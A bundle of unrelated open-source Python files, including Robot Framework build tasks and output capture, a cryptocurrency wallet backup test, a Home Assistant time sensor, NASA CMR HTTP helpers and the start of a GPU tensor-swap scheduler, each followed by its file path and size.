to install the latest available release or use
::
pip install robotframework=={version}
to install exactly this version. Alternatively you can download the source
distribution from PyPI_ and install it manually. For more details and other
installation approaches, see the `installation instructions`_.
Robot Framework {version} was released on {date}.
.. _Robot Framework: http://robotframework.org
.. _pip: http://pip-installer.org
.. _PyPI: https://pypi.python.org/pypi/robotframework
.. _issue tracker milestone: https://github.com/robotframework/robotframework/issues?q=milestone%3A{version.milestone}
.. _issue tracker: https://github.com/robotframework/robotframework/issues
.. _robotframework-users: http://groups.google.com/group/robotframework-users
.. _Robot Framework Slack: https://robotframework-slack-invite.herokuapp.com
.. _installation instructions: ../../INSTALL.rst
'''
@task
def set_version(ctx, version):
"""Set project version in `src/robot/version.py`` file.
Args:
version: Project version to set or ``dev`` to set development version.
Following PEP-440 compatible version numbers are supported:
- Final version like 3.0 or 3.1.2.
- Alpha, beta or release candidate with ``a``, ``b`` or ``rc`` postfix,
respectively, and an incremented number like 3.0a1 or 3.0.1rc1.
    - Development version with ``.dev`` postfix and an incremented number like
3.0.dev1 or 3.1a1.dev2.
When the given version is ``dev``, the existing version number is updated
to the next suitable development version. For example, 3.0 -> 3.0.1.dev1,
3.1.1 -> 3.1.2.dev1, 3.2a1 -> 3.2a2.dev1, 3.2.dev1 -> 3.2.dev2.
"""
version = Version(version, VERSION_PATH, VERSION_PATTERN)
version.write()
pom = Version(str(version), POM_PATH, POM_VERSION_PATTERN)
pom.write()
print(version)
@task
def print_version(ctx):
"""Print the current project version."""
print(Version(path=VERSION_PATH, pattern=VERSION_PATTERN))
@task
def library_docs(ctx, name):
"""Generate standard library documentation.
Args:
name: Name of the library or ``all`` to generate docs for all libs.
Name is case-insensitive and can be shortened as long as it
is a unique prefix. For example, ``b`` is equivalent to
``BuiltIn`` and ``di`` equivalent to ``Dialogs``.
"""
libraries = ['BuiltIn', 'Collections', 'DateTime', 'Dialogs',
'OperatingSystem', 'Process', 'Screenshot', 'String',
'Telnet', 'XML']
name = name.lower()
if name != 'all':
libraries = [lib for lib in libraries if lib.lower().startswith(name)]
if len(libraries) != 1:
raise Exit(f"'{name}' is not a unique library prefix.")
for lib in libraries:
libdoc(lib, str(Path(f'doc/libraries/{lib}.html')))
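# e.g. `invoke library-docs di` resolves the unique prefix and writes
# doc/libraries/Dialogs.html (Invoke exposes underscored task names with dashes).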
@task
def release_notes(ctx, version=None, username=None, password=None, write=False):
"""Generate release notes based on issues in the issue tracker.
Args:
version: Generate release notes for this version. If not given,
            generate them for the current version.
username: GitHub username.
password: GitHub password.
write: When set to True, write release notes to a file overwriting
possible existing file. Otherwise just print them to the
terminal.
Username and password can also be specified using ``GITHUB_USERNAME`` and
    ``GITHUB_PASSWORD`` environment variables, respectively. If they aren't
specified at all, communication with GitHub is anonymous and typically
pretty slow.
"""
version = Version(version, VERSION_PATH, VERSION_PATTERN)
file = RELEASE_NOTES_PATH if write else sys.stdout
generator = ReleaseNotesGenerator(REPOSITORY, RELEASE_NOTES_TITLE,
RELEASE_NOTES_INTRO)
generator.generate(version, username, password, file)
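# Example invocation (assumed credentials): set GITHUB_USERNAME and GITHUB_PASSWORD
# in the environment and run `invoke release-notes --write` to write the file.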
@task
def init_labels(ctx, username=None, password=None):
"""Initialize project by setting labels in the issue tracker.
Args:
username: GitHub username.
password: GitHub password.
Username and password can also be specified using ``GITHUB_USERNAME`` and
    ``GITHUB_PASSWORD`` environment variables, respectively.
    Should only be executed once when taking the ``rellu`` tooling into use or
    when the labels it uses have changed.
"""
initialize_labels(REPOSITORY, username, password)
@task
def jar(ctx, jython_version='2.7.0', pyyaml_version='3.11', remove_dist=False):
"""Create JAR distribution.
Downloads Jython JAR and PyYAML if needed.
Args:
jython_version: Jython version to use as a base. Must match version in
`jython-standalone-<version>.jar` found from Maven central.
pyyaml_version: Version of PyYAML that will be included in the
standalone jar. The version must be available from PyPI.
        remove_dist: Controls whether the 'dist' directory is initially removed.
"""
clean(ctx, remove_dist, create_dirs=True)
jython_jar = get_jython_jar(jython_version)
print(f"Using '{jython_jar}'.")
compile_java_files(ctx, jython_jar)
unzip_jar(jython_jar)
copy_robot_files()
pyaml_archive = get_pyyaml(pyyaml_version)
extract_and_copy_pyyaml_files(pyyaml_version, pyaml_archive)
compile_python_files(ctx, jython_jar)
version = Version(path=VERSION_PATH, pattern=VERSION_PATTERN)
create_robot_jar(ctx, str(version))
def get_jython_jar(version):
    filename = f'jython-standalone-{version}.jar'
url = (f'http://search.maven.org/remotecontent?filepath=org/python/'
f'jython-standalone/{version}/{filename}')
return get_extlib_file(filename, url)
def get_pyyaml(version):
filename = f'PyYAML-{version}.tar.gz'
url = f'https://pypi.python.org/packages/source/P/PyYAML/{filename}'
return get_extlib_file(filename, url)
def get_extlib_file(filename, url):
lib = Path('ext-lib')
path = Path(lib, filename)
if path.exists():
return path
print(f"'{filename}' not found, downloading it from '{url}'.")
lib.mkdir(exist_ok=True)
urlretrieve(url, path)
return path
def extract_and_copy_pyyaml_files(version, filename, build_dir='build'):
extracted = Path(tempfile.gettempdir(), 'pyyaml-for-robot')
if extracted.is_dir():
shutil.rmtree(str(extracted))
print(f"Extracting '{filename}' to '{extracted}'.")
with tarfile.open(filename) as t:
t.extractall(extracted)
source = Path(extracted, f'PyYAML-{version}', 'lib', 'yaml')
target = Path(build_dir, 'Lib', 'yaml')
shutil.copytree(str(source), str(target),
ignore=shutil.ignore_patterns('*.pyc'))
def compile_java_files(ctx, jython_jar, build_dir='build'):
root = Path('src/java/org/robotframework')
files = [str(path) for path in root.iterdir() if path.suffix == '.java']
print(f'Compiling {len(files)} Java files.')
ctx.run(f"javac -d {build_dir} -target 1.7 -source 1.7 -cp {jython_jar} "
f"{' '.join(files)}")
def unzip_jar(path, target='build'):
zipfile.ZipFile(path).extractall(target)
def copy_robot_files(build_dir='build'):
source = Path('src', 'robot')
target = Path(build_dir, 'Lib', 'robot')
shutil.copytree(str(source), str(target),
ignore=shutil.ignore_patterns('*.pyc'))
shutil.rmtree(str(Path(target, 'htmldata', 'testdata')))
def compile_python_files(ctx, jython_jar, build_dir='build'):
ctx.run(f"java -jar {jython_jar} -m compileall -x '.*3.py' {build_dir}")
# Jython will not work without its py-files, but robot will
for directory, _, files in os.walk(str(Path(build_dir, 'Lib', 'robot'))):
for name in files:
if name.endswith('.py'):
Path(directory, name).unlink()
def create_robot_jar(ctx, version, source='build'):
write_manifest(version, source)
target = Path(f'dist/robotframework-{version}.jar')
ctx.run(f'jar cvfM {target} -C {source} .')
print(f"Created '{target}'.")
def write_manifest(version, build_dir='build'):
with open(Path(build_dir, 'META-INF', 'MANIFEST.MF'), 'w') as mf:
mf.write(f'''\
Manifest-Version: 1.0
Main-Class: org.robotframework.RobotFramework
Specification-Version: 2
Implementation-Version: {version}
''')
| tasks.py | 10,074 |
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet backup features.
Test case is:
4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
"""
from decimal import Decimal
import os
from random import randint
import shutil
from test_framework.test_framework import AgroCoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class WalletBackupTest(AgroCoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
        # nodes 1, 2 and 3 are spenders; give them keypool=100
# whitelist all peers to speed up tx relay / mempool sync
self.extra_args = [
["-whitelist=noban@127.0.0.1", "-keypool=100"],
["-whitelist=noban@127.0.0.1", "-keypool=100"],
["-whitelist=noban@127.0.0.1", "-keypool=100"],
["-whitelist=noban@127.0.0.1"],
]
self.rpc_timeout = 120
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
self.setup_nodes()
self.connect_nodes(0, 3)
self.connect_nodes(1, 3)
self.connect_nodes(2, 3)
self.connect_nodes(2, 0)
self.sync_all()
def one_send(self, from_node, to_address):
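        # With 50% probability, send a random amount between 0.1 and 1.0 coins.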
        if randint(1, 2) == 1:
            amount = Decimal(randint(1, 10)) / Decimal(10)
self.nodes[from_node].sendtoaddress(to_address, amount)
def do_one_round(self):
a0 = self.nodes[0].getnewaddress()
a1 = self.nodes[1].getnewaddress()
a2 = self.nodes[2].getnewaddress()
self.one_send(0, a1)
self.one_send(0, a2)
self.one_send(1, a0)
self.one_send(1, a2)
self.one_send(2, a0)
self.one_send(2, a1)
# Have the miner (node3) mine a block.
# Must sync mempools before mining.
self.sync_mempools()
self.nodes[3].generate(1)
self.sync_blocks()
# As above, this mirrors the original bash test.
def start_three(self, args=()):
self.start_node(0, self.extra_args[0] + list(args))
self.start_node(1, self.extra_args[1] + list(args))
self.start_node(2, self.extra_args[2] + list(args))
self.connect_nodes(0, 3)
self.connect_nodes(1, 3)
self.connect_nodes(2, 3)
self.connect_nodes(2, 0)
def stop_three(self):
self.stop_node(0)
self.stop_node(1)
self.stop_node(2)
def erase_three(self):
os.remove(os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
os.remove(os.path.join(self.nodes[1].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
os.remove(os.path.join(self.nodes[2].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
def init_three(self):
self.init_wallet(0)
self.init_wallet(1)
self.init_wallet(2)
def run_test(self):
self.log.info("Generating initial blockchain")
self.nodes[0].generate(1)
self.sync_blocks()
self.nodes[1].generate(1)
self.sync_blocks()
self.nodes[2].generate(1)
self.sync_blocks()
self.nodes[3].generate(100)
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 50)
assert_equal(self.nodes[3].getbalance(), 0)
self.log.info("Creating transactions")
# Five rounds of sending each other transactions.
for _ in range(5):
self.do_one_round()
self.log.info("Backing up")
self.nodes[0].backupwallet(os.path.join(self.nodes[0].datadir, 'wallet.bak'))
self.nodes[1].backupwallet(os.path.join(self.nodes[1].datadir, 'wallet.bak'))
self.nodes[2].backupwallet(os.path.join(self.nodes[2].datadir, 'wallet.bak'))
if not self.options.descriptors:
self.nodes[0].dumpwallet(os.path.join(self.nodes[0].datadir, 'wallet.dump'))
self.nodes[1].dumpwallet(os.path.join(self.nodes[1].datadir, 'wallet.dump'))
self.nodes[2].dumpwallet(os.path.join(self.nodes[2].datadir, 'wallet.dump'))
self.log.info("More transactions")
for _ in range(5):
self.do_one_round()
# Generate 101 more blocks, so any fees paid mature
self.nodes[3].generate(101)
self.sync_all()
balance0 = self.nodes[0].getbalance()
balance1 = self.nodes[1].getbalance()
balance2 = self.nodes[2].getbalance()
balance3 = self.nodes[3].getbalance()
total = balance0 + balance1 + balance2 + balance3
# At this point, there are 214 blocks (103 for setup, then 10 rounds, then 101.)
# 114 are mature, so the sum of all wallets should be 114 * 50 = 5700.
assert_equal(total, 5700)
##
# Test restoring spender wallets from backups
##
self.log.info("Restoring using wallet.dat")
self.stop_three()
self.erase_three()
# Start node2 with no chain
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'blocks'))
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'chainstate'))
# Restore wallets from backup
shutil.copyfile(os.path.join(self.nodes[0].datadir, 'wallet.bak'), os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
shutil.copyfile(os.path.join(self.nodes[1].datadir, 'wallet.bak'), os.path.join(self.nodes[1].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
shutil.copyfile(os.path.join(self.nodes[2].datadir, 'wallet.bak'), os.path.join(self.nodes[2].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename))
self.log.info("Re-starting nodes")
self.start_three()
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
if not self.options.descriptors:
self.log.info("Restoring using dumped wallet")
self.stop_three()
self.erase_three()
            # Start node2 with no chain
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'blocks'))
shutil.rmtree(os.path.join(self.nodes[2].datadir, self.chain, 'chainstate'))
self.start_three(["-nowallet"])
self.init_three()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
self.nodes[0].importwallet(os.path.join(self.nodes[0].datadir, 'wallet.dump'))
self.nodes[1].importwallet(os.path.join(self.nodes[1].datadir, 'wallet.dump'))
self.nodes[2].importwallet(os.path.join(self.nodes[2].datadir, 'wallet.dump'))
self.sync_blocks()
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
# Backup to source wallet file must fail
sourcePaths = [
os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name, self.wallet_data_filename),
os.path.join(self.nodes[0].datadir, self.chain, '.', 'wallets', self.default_wallet_name, self.wallet_data_filename),
os.path.join(self.nodes[0].datadir, self.chain, 'wallets', self.default_wallet_name),
os.path.join(self.nodes[0].datadir, self.chain, 'wallets')]
for sourcePath in sourcePaths:
assert_raises_rpc_error(-4, "backup failed", self.nodes[0].backupwallet, sourcePath)
if __name__ == '__main__':
WalletBackupTest().main()
| test/functional/wallet_backup.py | 8,945 |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from robot.utils import StringIO
from robot.output import LOGGER
from robot.utils import decode_output, encode_output, JYTHON
class OutputCapturer(object):
def __init__(self, library_import=False):
self._library_import = library_import
self._python_out = PythonCapturer(stdout=True)
self._python_err = PythonCapturer(stdout=False)
self._java_out = JavaCapturer(stdout=True)
self._java_err = JavaCapturer(stdout=False)
def __enter__(self):
if self._library_import:
LOGGER.enable_library_import_logging()
return self
def __exit__(self, exc_type, exc_value, exc_trace):
self._release_and_log()
if self._library_import:
LOGGER.disable_library_import_logging()
return False
def _release_and_log(self):
stdout, stderr = self._release()
if stdout:
LOGGER.log_output(stdout)
if stderr:
LOGGER.log_output(stderr)
sys.__stderr__.write(encode_output(stderr))
def _release(self):
stdout = self._python_out.release() + self._java_out.release()
stderr = self._python_err.release() + self._java_err.release()
return stdout, stderr
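# Usage sketch (call sites live elsewhere in the framework; `run_keyword` here
# is a hypothetical stand-in): anything written to stdout/stderr inside the
# block is captured and routed to the Robot Framework logger on exit.
#
#     with OutputCapturer(library_import=True):
#         run_keyword()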
class PythonCapturer(object):
def __init__(self, stdout=True):
if stdout:
self._original = sys.stdout
self._set_stream = self._set_stdout
else:
self._original = sys.stderr
self._set_stream = self._set_stderr
self._stream = StringIO()
self._set_stream(self._stream)
def _set_stdout(self, stream):
sys.stdout = stream
def _set_stderr(self, stream):
sys.stderr = stream
def release(self):
# Original stream must be restored before closing the current
self._set_stream(self._original)
try:
return self._get_value(self._stream)
finally:
self._stream.close()
self._avoid_at_exit_errors(self._stream)
def _get_value(self, stream):
try:
return decode_output(stream.getvalue())
except UnicodeError:
# Error occurs if non-ASCII chars logged both as str and unicode.
stream.buf = decode_output(stream.buf)
stream.buflist = [decode_output(item) for item in stream.buflist]
return stream.getvalue()
def _avoid_at_exit_errors(self, stream):
# Avoid ValueError at program exit when logging module tries to call
# methods of streams it has intercepted that are already closed.
# Which methods are called, and does logging silence possible errors,
# depends on Python/Jython version. For related discussion see
# http://bugs.python.org/issue6333
stream.write = lambda s: None
stream.flush = lambda: None
if not JYTHON:
class JavaCapturer(object):
def __init__(self, stdout=True):
pass
def release(self):
return u''
else:
from java.io import ByteArrayOutputStream, PrintStream
from java.lang import System
class JavaCapturer(object):
def __init__(self, stdout=True):
if stdout:
self._original = System.out
self._set_stream = System.setOut
else:
self._original = System.err
self._set_stream = System.setErr
self._bytes = ByteArrayOutputStream()
self._stream = PrintStream(self._bytes, False, 'UTF-8')
self._set_stream(self._stream)
def release(self):
# Original stream must be restored before closing the current
self._set_stream(self._original)
self._stream.close()
output = self._bytes.toString('UTF-8')
self._bytes.reset()
return output
| src/robot/running/outputcapture.py | 4,478 |
"""A module for useful functions.
:author: Matthew Gidden <matthew.gidden _at_ gmail.com>
"""
import numpy as np
rms = lambda a, axis=None: np.sqrt(np.mean(np.square(a), axis=axis))
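# Example: rms(np.array([3.0, 4.0])) == np.sqrt((9 + 16) / 2) ~= 3.5355;
# for a 2-D input, axis=0 yields one RMS value per column.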
| cyclopts/functionals.py | 188 |
"""
Support for showing the date and the time.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.time_date/
"""
from datetime import timedelta
import asyncio
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_DISPLAY_OPTIONS
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
TIME_STR_FORMAT = '%H:%M'
OPTION_TYPES = {
'time': 'Time',
'date': 'Date',
'date_time': 'Date & Time',
'time_date': 'Time & Date',
'beat': 'Internet Time',
'time_utc': 'Time (UTC)',
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_DISPLAY_OPTIONS, default=['time']):
vol.All(cv.ensure_list, [vol.In(OPTION_TYPES)]),
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Setup the Time and Date sensor."""
if hass.config.time_zone is None:
_LOGGER.error("Timezone is not set in Home Assistant configuration")
return False
devices = []
for variable in config[CONF_DISPLAY_OPTIONS]:
devices.append(TimeDateSensor(variable))
hass.loop.create_task(async_add_devices(devices, True))
return True
class TimeDateSensor(Entity):
"""Implementation of a Time and Date sensor."""
def __init__(self, option_type):
"""Initialize the sensor."""
self._name = OPTION_TYPES[option_type]
self.type = option_type
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def icon(self):
"""Icon to use in the frontend, if any."""
if 'date' in self.type and 'time' in self.type:
return 'mdi:calendar-clock'
elif 'date' in self.type:
return 'mdi:calendar'
else:
return 'mdi:clock'
@asyncio.coroutine
def async_update(self):
"""Get the latest data and updates the states."""
time_date = dt_util.utcnow()
time = dt_util.as_local(time_date).strftime(TIME_STR_FORMAT)
time_utc = time_date.strftime(TIME_STR_FORMAT)
date = dt_util.as_local(time_date).date().isoformat()
# Calculate Swatch Internet Time.
time_bmt = time_date + timedelta(hours=1)
delta = timedelta(
hours=time_bmt.hour, minutes=time_bmt.minute,
seconds=time_bmt.second, microseconds=time_bmt.microsecond)
beat = int((delta.seconds + delta.microseconds / 1000000.0) / 86.4)
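        # Worked example: at 12:00:00 UTC, BMT is 13:00:00, so
        # beat = 46800 / 86.4 = 541.67 and the state becomes '@541'.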
if self.type == 'time':
self._state = time
elif self.type == 'date':
self._state = date
elif self.type == 'date_time':
self._state = '{}, {}'.format(date, time)
elif self.type == 'time_date':
self._state = '{}, {}'.format(time, date)
elif self.type == 'time_utc':
self._state = time_utc
elif self.type == 'beat':
self._state = '@{0:03d}'.format(beat)
| homeassistant/components/sensor/time_date.py | 3,314 |
# NASA EO-Metadata-Tools Python interface for the Common Metadata Repository (CMR)
#
# https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html
#
# Copyright (c) 2020 United States Government as represented by the Administrator
# of the National Aeronautics and Space Administration. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
date 2020-11-05
since 0.0
"""
import json
import logging
import urllib.parse
import urllib.request
import cmr.util.common as common
logging.basicConfig(level = logging.ERROR)
logger = logging.getLogger('cmr.util.network')
def get_local_ip():
"""Rewrite this stub, it is used in code not checked in yet """
return '127.0.0.1'
def value_to_param(key, value):
"""
Convert a key value pair into a URL parameter pair
"""
value = str(value)
encoded_key = urllib.parse.quote(key)
encoded_value = urllib.parse.quote(value)
result = encoded_key + "=" + encoded_value
return result
def expand_parameter_to_parameters(key, parameter):
"""
Convert a list of values into a list of URL parameters
"""
result = []
if isinstance(parameter, list):
for item in parameter:
param = value_to_param(key, item)
result.append(param)
else:
value = str(parameter)
encoded_key = urllib.parse.quote(key)
encoded_value = urllib.parse.quote(value)
result.append(encoded_key + "=" + encoded_value)
return result
def expand_query_to_parameters(query=None):
""" Convert a dictionary to URL parameters """
params = []
if query is None:
return ""
keys = sorted(query.keys())
for key in keys:
value = query[key]
params = params + expand_parameter_to_parameters(key, value)
return "&".join(params)
def apply_headers_to_request(req, headers):
"""Apply a headers to a urllib request object """
if headers is not None and req is not None:
for key in headers:
value = headers[key]
if value is not None and len(value)>0:
req.add_header(key, value)
def transform_results(results, keys_of_interest):
"""
Take a list of results and convert them to a multi valued dictionary. The
real world use case is to take values from a list of collections and pass
them to a granule search.
[{key1:value1},{key1:value2},...] -> {"key1": [value1,value2]} ->
&key1=value1&key1=value2 ( via expand_query_to_parameters() )
"""
params = {}
for item in results:
for key in keys_of_interest:
if key in item:
value = item[key]
if key in params:
params[key].append(value)
else:
params[key] = [value]
return params
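# Example with a hypothetical key: transform_results([{'id': 'C1'}, {'id': 'C2'}], ['id'])
# returns {'id': ['C1', 'C2']}, ready to be passed to expand_query_to_parameters().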
def config_to_header(config, source_key, headers, destination_key=None, default=None):
"""
    Copy a value from the config into a header dictionary for use by urllib. Written
    to reduce boilerplate code.
config[key] -> [or default] -> [rename] -> headers[key]
Parameters:
config(dictionary): where to look for values
        source_key(string): name of the configuration item in config
headers(dictionary): where to copy values to
destination_key(string): name of key to save to in headers
default(string): value to use if value can not be found in config
"""
config = common.always(config)
if destination_key is None:
destination_key = source_key
value = config.get(source_key, default)
if destination_key is not None and value is not None:
if headers is None:
headers = {}
headers[destination_key] = value
return headers
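# Example with assumed keys: config_to_header({'cmr-token': 'abc'}, 'cmr-token', {},
# destination_key='Authorization') returns {'Authorization': 'abc'}.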
def post(url, body, accept=None, headers=None):
"""
Make a basic HTTP call to CMR using the POST action
Parameters:
url (string): resource to get
body (dictionary): parameters to send, or string if raw text to be sent
accept (string): encoding of the returned data, some form of json is expected
        client_id (string): name of the client making the request (not python or curl)
headers (dictionary): HTTP headers to apply
"""
if isinstance(body, str):
        # JSON string or other such text passed in
data = body
else:
# Do not use the standard url encoder `urllib.parse.urlencode(body)` for
# the body/data because it can not handle repeating values as required
# by CMR. For example: `{'entry_title': ['2', '3']}` must become
# `entry_title=2&entry_title=3` not `entry_title=[2, 3]`
data = expand_query_to_parameters(body)
data = data.encode('utf-8')
logger.debug(" Headers->CMR= %s", headers)
logger.debug(" POST Data= %s", data)
req = urllib.request.Request(url, data)
if accept is not None:
apply_headers_to_request(req, {'Accept': accept})
apply_headers_to_request(req, headers)
try:
#pylint: disable=R1732 # the mock code does not support this in tests
resp = urllib.request.urlopen(req)
response = resp.read()
raw_response = response.decode('utf-8')
if resp.status == 200:
obj_json = json.loads(raw_response)
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
if logger.getEffectiveLevel() == logging.DEBUG:
stringified = str(common.mask_dictionary(head_list, ["cmr-token", "authorization"]))
logger.debug(" CMR->Headers = %s", stringified)
obj_json['http-headers'] = head_list
elif resp.status == 204:
obj_json = {}
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
obj_json['http-headers'] = head_list
else:
if raw_response.startswith("{") and raw_response.endswith("}"):
return json.loads(raw_response)
return raw_response
return obj_json
except urllib.error.HTTPError as exception:
raw_response = exception.read()
try:
obj_json = json.loads(raw_response)
obj_json['code'] = exception.code
obj_json['reason'] = exception.reason
return obj_json
except json.decoder.JSONDecodeError as err:
return err
return raw_response
def get(url, accept=None, headers=None):
"""
    Make a basic HTTP call to CMR using the GET action
    Parameters:
        url (string): resource to get
        accept (string): encoding of the returned data, some form of json is expected
        headers (dictionary): HTTP headers to apply
"""
logger.debug(" Headers->CMR= %s", headers)
req = urllib.request.Request(url)
if accept is not None:
apply_headers_to_request(req, {'Accept': accept})
apply_headers_to_request(req, headers)
try:
#pylint: disable=R1732 # the mock code does not support this in tests
resp = urllib.request.urlopen(req)
response = resp.read()
raw_response = response.decode('utf-8')
if resp.status == 200:
obj_json = json.loads(raw_response)
if isinstance(obj_json, list):
data = obj_json
obj_json = {"hits": len(data), "items" : data}
#print (obj_json)
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
if logger.getEffectiveLevel() == logging.DEBUG:
stringified = str(common.mask_dictionary(head_list, ["cmr-token", "authorization"]))
logger.debug(" CMR->Headers = %s", stringified)
#obj_json['http-headers'] = head_list
elif resp.status == 204:
obj_json = {}
head_list = {}
for head in resp.getheaders():
head_list[head[0]] = head[1]
obj_json['http-headers'] = head_list
else:
if raw_response.startswith("{") and raw_response.endswith("}"):
return json.loads(raw_response)
return raw_response
return obj_json
except urllib.error.HTTPError as exception:
raw_response = exception.read()
try:
obj_json = json.loads(raw_response)
obj_json['code'] = exception.code
obj_json['reason'] = exception.reason
return obj_json
except json.decoder.JSONDecodeError as err:
return err
return raw_response
| CMR/python/cmr/util/network.py | 9,242 |
import copy
from enum import Enum
import multiprocessing
import numpy as np
from functools import cmp_to_key
import plotly as py
import plotly.figure_factory as ff
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import plotly
from collections import defaultdict
import os
from pynvml import *
import time
import matplotlib
# matplotlib.use('Agg')
import pickle
from keras.models import Sequential, load_model
from keras.layers import Dense, Conv1D, MaxPool1D, Dropout, Flatten
from matplotlib import cm
from tensorboard.plugins.hparams import keras
from line_profiler import LineProfiler
from typing import List
def get_PCIE_bandwidth():
# if not debug_mod:
# PCIE_bandwidth = nvmlDeviceGetPcieThroughput(handle, NVML_PCIE_UTIL_COUNT) # KB/s => MB/ms
# PCIE_bandwidth /= 1000000
# else:
PCIE_bandwidth = 12
return PCIE_bandwidth
GPU = int(os.environ['CUDA_VISIBLE_DEVICES'])
debug_mod = False
if not debug_mod:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(GPU)
pyplt = py.offline.plot
PCIE_bandwidth = get_PCIE_bandwidth()
load_list = ['convolution_2d_forward_VALID', 'convolution_backward_filter_2d_VALID', 'convolution_backward_data_2d_VALID',
'convolution_2d_forward_SAME', 'convolution_backward_filter_2d_SAME', 'convolution_backward_data_2d_SAME',
'dropout_forward', 'dropout_backward', 'broadcast_to_NHWC',
'broadcast_to_NCHW', 'reduce_sum_new_NHWC', 'reduce_sum_new_NCHW',
'bn_forward_pre_activation', 'bn_backward_pre_activation', 'activation_forward_relu',
'activation_backward_relu', 'activation_forward_softmax', 'activation_backward_softmax',
'pooling_2d_forward_max', 'pooling_2d_backward_max', 'pooling_2d_forward_mean',
'pooling_2d_backward_mean', 'matrix_multiply', 'matrix_elementwise_multiply_by_const', 'matrix_elementwise_add',
'array_set', 'concat_forward', 'concat_a_backward',
'concat_b_backward', 'sgd_update', 'cross', 'cross_backward', 'adam_mv', 'adam_compute']
optimizer_op = ['AdamOp']
class TaskType(Enum):
swap_out = 0
swap_in = 1
class AccessType(Enum):
output = 0
input = 1
class Tensor:
def __init__(self, tensor_id, job_id, size, shape, recomputation_time, source_tensors=None, is_parameter=False, is_input_or_output=False):
self.tensor_id = tensor_id
self.job_id = job_id
self.size = size
self.swap_time = self.size / PCIE_bandwidth
self.source_tensors = source_tensors if source_tensors is not None else []
self.recomputation_time = recomputation_time
self.recomputation_metric = self.size / self.recomputation_time
self.is_parameter = is_parameter
self.shape = shape
if self.is_parameter or is_input_or_output:
self.in_gpu_at_beginning = True
else:
self.in_gpu_at_beginning = False
def __repr__(self):
return f'tensor_id:{self.tensor_id}, job_id":{self.job_id}, size:{self.size}'
def update_swap_time(self):
PCIE_bandwidth = get_PCIE_bandwidth()
# print(f'PCIE_bandwidth:{PCIE_bandwidth}')
self.swap_time = self.size / PCIE_bandwidth
class TensorAccess:
def __init__(self, tensor, time, run_time, access_type, operation_id, operation_name):
self.tensor = tensor
self.access_id = None
self.start_time = None
self.end_time = None
self.time = time
self.run_time = run_time
self.access_type = access_type
if self.access_type == AccessType.output:
self.end_time = self.time
self.start_time = self.time - self.run_time
else:
self.start_time = self.time
self.end_time = self.time + self.run_time
self.release_flag = False
self.operation_id = operation_id
self.operation_name = operation_name
self.release_for_recomputation = []
def to_tuple(self):
return (self.tensor.tensor_id, self.time)
def __repr__(self):
